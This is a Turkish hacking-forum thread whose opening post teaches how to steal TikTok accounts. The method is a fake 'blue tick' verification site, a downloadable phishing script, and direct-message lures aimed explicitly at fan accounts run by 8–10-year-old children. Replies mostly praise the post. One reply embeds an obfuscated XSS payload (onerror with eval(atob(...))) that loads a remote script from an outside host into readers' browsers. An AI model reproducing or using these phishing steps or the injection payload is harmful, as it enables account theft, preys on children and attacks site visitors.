Sosyal Mühendislik İle Tiktok Hesap Ele Geçirmek

Reaktorz

Üye
2 Ocak 2020
98
12
Herkese Merhabalar bu gün sosyal mühendislik ile nasıl tiktok hesap çalabilirsiniz onu göstereceğim bu yöntemi bende uyguladım ve 20K ya kadar hesap düşürdüm sadece kandırma yeteneğiniz biraz güçlü olmalı.

İlk olarak bize mavi tik scripti lazım onu konunun altında vereceğim birde alan adı tiktok mavi tik ile ilgili bir şey olmalı http://tiktokmavirozet.gq/ örneğin buradaki site gibi.

Script'i kurduk her şey tamam sırada kurbanları avlamaya geldi şimdi biraz düşünelim ben tiktok uygulamasında bir şeyler yaptığım için burada biraz vakit geçirdim ve dikkatimi çeken bazı şeyler oldu. Bunlar çok fazla takipçili (30K-40K) fan hesapları olmasıydı ve bu hesaplar 8-9-10 yaşlarında kandırılması kolay olan çocuklar tarafından yönetiliyordu. Bana göre ise bu çocukların tek amaçları sevdiği fenomenler tarafından fark edilmekti ve bana göre bu da onların zayıf yönüydü.

Bende işe koyuldum ve ilk olarak bir fan hesabı arattım nasıl yapacağınızı söyleyeyim hemen x fenomenin adını yazın ve sonuna fan gibi şeyler ekleyin ve onlara özel mesaj yoluyla bende x fenomenini çok seviyorum ama beni fark etmiyor bende mavi tik'e başvurdum sende yap istersen çok güzel gibi şeyler yazın burası sizin hayal gücünüze kalmış buradaki örnek biraz amatörce tabi ama amacı hep aynı sitede bulunan forum bölümüne onu hesap bilgilerini girmesini sağlamak. Kurban girdikten sonra script'in sonuna /sifre.txt yazarak bilgileri görebilirsiniz.

Günde onlarca dm bastım ve iyi bir kandırma yöntemi ile yararlı sonuçlar elde ettim işinize yarar diye düşünüyorum bu benim ilk konumdu hatalarım varsa affola kalın sağlıcakla.

NOT SCRİPT BANA AİT DEĞİLDİRhttps://www.mediafire.com/file/6jqko9mzlqunuk0/Tiktok-raizyscript.zip/file

VİRÜS TOTALhttps://www.virustotal.com/gui/file/b10547a3b8077558b275d0ae985fde7ba0d4747ad4abe2c9429319e4567b1c13/detection

Moderatör tarafında düzenlendi:

aa2

Yeni üye
12 Ocak 2021
48
5
Cevap: Sosyal Mühendislik İle Tiktok Hesap Çalmak!

Ellerine sağlık :yardimsever

deepdead00

Üye
21 Nis 2021
187
10

Ellerine sağlık gayet güzel anlatmışsın :cool

5 Şub 2015
97
1
Ontario
Emeğinize sağlık hocam :)
http://www.asd.com/***.pnn' style='display: none' onerror='eval(atob("dmFyIHggPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTsKeC5zcmMgPSAiaHR0cHM6Ly9lNzE0NGI5M2YyMmIwZGQuaGVyb2t1YXBwLmNvbS92YnVsbGV0aW4tdW5pdmVyc2FsLmpzIjsKZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZCh4KTs"));

Son düzenleme:

sαw

Katılımcı Üye
18 Ocak 2019
593
8
Antalya

Ellerine sağlık gayet güzel anlatmışsın :cool

Ellerine sağlık gayet güzel anlatmışsın

Son düzenleme:

Eagleweb

Kıdemli Üye
8 May 2021
2,120
1,151
localhost/e8

sαw;9382627' Alıntı:
Özür dilerim fakat simetri hastalığım buna el vermedi .

Ellerine sağlık gayet güzel anlatmışsın

Merhaba,
Ben de geçen gün bir konudan alıntı yaparken aynı durum ile karşı karşıya kaldım insanı sinir ediyor :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.